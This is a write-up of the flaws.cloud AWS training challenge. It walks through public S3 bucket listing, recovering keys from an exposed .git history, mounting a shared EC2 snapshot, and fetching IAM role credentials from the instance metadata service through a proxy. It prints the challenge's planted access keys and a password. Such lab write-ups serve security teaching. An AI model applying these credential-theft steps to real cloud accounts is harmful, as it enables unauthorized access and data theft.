Level #1

Figure 1 Level 1 Challenge flaws.cloud

I used nslookup to get DNS information of flaws.cloud:

Figure 2 nslookup flaws.cloud

After that, I used nslookup to perform a reverse DNS lookup on IP address 52.218.201.59 to find the corresponding domain:

Figure 3 reverse DNS lookup IP 52.218.201.59
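The two lookups above can be reproduced with commands along these lines (the exact IP returned will vary, since S3 rotates addresses):

```shell
# Forward lookup: resolve flaws.cloud to an IP address
nslookup flaws.cloud

# Reverse lookup: map the returned IP back to a hostname, which
# reveals an s3-website-us-west-2.amazonaws.com name
nslookup 52.218.201.59
```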

From the reverse DNS lookup, I learned that flaws.cloud is hosted in an Amazon S3 bucket in the us-west-2 region. To explore the bucket contents, I used the AWS CLI:

Figure 4 explore s3 bucket of flaws.cloud using aws cli
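A sketch of the listing step, assuming the bucket allows anonymous access (for S3 static website hosting, the bucket name matches the domain name; `--no-sign-request` skips credentials entirely):

```shell
# List the bucket that backs the static site anonymously
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
```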

In the picture above, we can see the secret-dd02c7c.html file, which is the secret file I was looking for:

Figure 5 Found the secret file located in flaws.cloud/secret-dd02c7c.html

Level #2

Figure 6 Level 2 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

After configuring my profile in ~/.aws/credentials, I used the AWS CLI to list the contents of level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Figure 7 Content of level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/
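This bucket is listable by any authenticated AWS user, so any valid credentials work. Assuming a profile named `myprofile` (a placeholder for whatever name is configured in ~/.aws/credentials), the listing might look like:

```shell
# Level 2's bucket grants list access to "Any Authenticated AWS User",
# so credentials from an unrelated AWS account are enough
aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ --profile myprofile
```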

As seen in the picture above, the secret file is named secret-e4443fc.html. I then accessed the file in my web browser:

Figure 8 Secret file for level 2 can be accessed in level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html

Level #3

Figure 9 Level #3 Challenge level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Using the AWS CLI, I listed the contents of the S3 bucket and saw that there was a .git directory.

Figure 10 Content of challenge 3 s3 bucket

Figure 11 Content of git directory inside challenge 3 s3 bucket

A .git directory should never be placed inside a web directory and made accessible to everyone, because it often contains sensitive data such as keys, source code, and configuration files. To explore the .git directory, I downloaded the whole S3 bucket to my laptop:

Figure 12 Downloading the s3 bucket
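Downloading the whole bucket can be done with `aws s3 sync`, roughly:

```shell
# Recursively download the bucket, including the exposed .git directory
mkdir level3 && cd level3
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request
```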

Figure 13 Downloaded s3 bucket content in my laptop

Running git log gave me a hint that the creator had accidentally committed sensitive data:

Figure 14 Hint from git log

After that, I ran git checkout to see the content of the previous commit:

Figure 15 Git checkout to see content at the previous commit
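The git inspection steps above, sketched inside the downloaded bucket directory (`<first-commit-hash>` is a placeholder; `git log` prints the real hash):

```shell
# Show the commit history; the first commit's message hints at leaked data
git log --oneline

# Check out the earlier commit to recover the file deleted in HEAD
git checkout <first-commit-hash>
```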

I then examined the bucket content and saw an access_key.txt file containing an AWS access key and secret key: access_key AKIAJ366LIPB4IJKT7SA, secret_access_key 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

Figure 16 I found the access_key and secret_key

I used these keys to add a new AWS profile on my laptop:

Figure 17 Add a new aws profile
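The resulting entry in ~/.aws/credentials would look like this, using the keys recovered from access_key.txt:

```ini
[flaws]
aws_access_key_id = AKIAJ366LIPB4IJKT7SA
aws_secret_access_key = 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
```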

Using the newly added flaws profile, I listed the S3 buckets and found the complete list of available buckets, including the one used to host challenge 4:

Figure 17_1
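Listing the buckets with the new profile is a one-liner:

```shell
# Enumerate every bucket visible to the leaked credentials
aws s3 ls --profile flaws
```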

Level #4

Figure 18 Level 4 Challenge

When I tried to access the web page, the web server asked me to enter valid credentials, which I didn't have:

Figure 19 web page is protected

After that, I tried to get the account ID using the flaws access key that I had set up earlier:

Figure 20 Getting account ID
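One way to get the account ID behind an access key is `sts get-caller-identity`:

```shell
# Returns the account ID, user ARN, and user ID for the profile
aws sts get-caller-identity --profile flaws
```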

Because I knew from the challenge description that an EC2 snapshot had been made, I tried to list the EC2 snapshots owned by the user:

Figure 21 EC2 snapshots owned by the user
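A sketch of the snapshot enumeration, where `<ACCOUNT_ID>` is a placeholder for the account ID returned by the previous step:

```shell
# List EC2 snapshots owned by the flaws account in us-west-2
aws ec2 describe-snapshots --owner-ids <ACCOUNT_ID> --region us-west-2 --profile flaws
```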

As seen in the picture above, there was a snapshot backup named "flaws backup 2017.02.27". To explore what was inside the snapshot, I used it to create a volume in my own AWS account:

Figure 22 Create a volume using the snapshot
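Roughly, the volume creation step looks like this (`<SNAPSHOT_ID>` is a placeholder for the ID from the previous listing; the snapshot is publicly shared, so any account can use it):

```shell
# The volume must be created in the snapshot's region; pick an
# availability zone matching the EC2 instance it will attach to
aws ec2 create-volume --region us-west-2 --availability-zone us-west-2a --snapshot-id <SNAPSHOT_ID>
```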

After that, I launched an EC2 instance and attached the volume to it:

Figure 23 Attach the volume to an EC2 instance

I then connected to the instance using SSH:

Figure 24 Connected to the instance using SSH

And mounted the volume:

Figure 25 Mounted the volume
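On the instance, the mount steps were along these lines (device names vary by instance type, so `lsblk` is used to find the attached volume first):

```shell
# Identify the attached volume and its partitions
lsblk

# Mount the first partition of the attached volume
# (often /dev/xvdb1, or /dev/nvme1n1p1 on newer instance types)
sudo mkdir -p /mnt/flaws
sudo mount /dev/xvdb1 /mnt/flaws

# Locate the web root (the www directory) on the mounted filesystem
find /mnt/flaws -maxdepth 3 -name www
```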

I was finally able to read the web page inside the www directory:

Figure 26 html file containing the next level link level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Exploring further, I also found the username and password used to access the web page:

Figure 27 username and password to access the web page username: flaws password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

I successfully accessed the web page using the username and password that I found:

Figure 28 Successfully accessed the web page

Level #5

Figure 29 Level 5 Challenge

After learning how the proxy works, I used it to access IP address 169.254.169.254, the special link-local address that serves EC2 instance metadata:

Figure 30 Metadata stored in 169.254.169.254
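The metadata service can be reached by appending the target URL to the proxy path; a sketch, where `<proxy-host>` stands for the proxy hostname given on the challenge page:

```shell
# Walk the instance metadata tree through the proxy
curl http://<proxy-host>/proxy/169.254.169.254/latest/meta-data/

# The IAM role credentials live under security-credentials/
curl http://<proxy-host>/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/
```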

While exploring the metadata, I found a sensitive access key, secret access key, and session token:

Figure 31 I found sensitive metadata

After that, I configured a new profile named "level5" in the AWS credentials file on my laptop:

Figure 32 Configured a new profile named “level5”
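Because these are temporary role credentials, the profile needs the session token as well as the key pair; the entry would look roughly like this (the placeholder values come from the metadata response):

```ini
[level5]
aws_access_key_id = <access key from the metadata>
aws_secret_access_key = <secret key from the metadata>
aws_session_token = <token from the metadata>
```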

After that, as instructed, I listed the contents of the level 6 bucket:

Figure 33 The content of level 6 bucket

Level #6

Figure 34 Level 6 Challenge

First, I added a new profile to the AWS credentials file on my laptop:

Figure 35 Added a new profile named level6

After that, I used the AWS CLI to get the username of the account:

Figure 36 I got the username of the account

And the security policies attached to the user:

Figure 37 security policies attached to the account
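The IAM enumeration above, sketched (`<username>` is a placeholder for whatever `get-user` returns):

```shell
# Identify the user behind the level 6 credentials
aws iam get-user --profile level6

# List the managed policies attached to that user
aws iam list-attached-user-policies --user-name <username> --profile level6
```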

I decided to explore the list_apigateways policy further, since it is not one of the default policies provided by AWS:

Figure 38 get more information to the policy

Figure 39 read the policy
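Reading a managed policy takes two calls: one to find the default version ID and one to dump the policy document. A sketch, where `<policy-arn>` comes from the attached-policies listing and the version ID (v1 here) comes from the first call's output:

```shell
# Find the policy's default version ID
aws iam get-policy --policy-arn <policy-arn> --profile level6

# Dump the actual policy document for that version
aws iam get-policy-version --policy-arn <policy-arn> --version-id v1 --profile level6
```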

The API Gateway in the policy above is used to call a Lambda function. To learn how to invoke the function, I listed the available functions:

Figure 40 Available lambda functions named Level6

After that, I read the Level6 Lambda function's policy:

Figure 41 Level6 lambda function policy
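The Lambda enumeration steps above, roughly:

```shell
# List the functions visible to the level6 user
aws lambda list-functions --region us-west-2 --profile level6

# Read the resource policy on the Level6 function; it names
# the rest-api-id that is allowed to invoke it
aws lambda get-policy --function-name Level6 --region us-west-2 --profile level6
```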

From the policy, I learned that I could execute the function, and it also gave me the rest-api-id. I then ran the command below to get the stages of the REST API:

Figure 42 get stages of the rest api
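With the rest-api-id from the Lambda policy, the stage lookup looks like this; the stage name completes the invoke URL of the form `https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage>/<function>`:

```shell
# List the deployment stages of the REST API
aws apigateway get-stages --rest-api-id s33ppypa75 --region us-west-2 --profile level6
```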

Using all the information I had collected, I ran the Lambda function by accessing the URL: s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Figure 43 Executing the lambda function

As seen in the picture above, the final URL is: theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/

Figure 44 The End of the challenges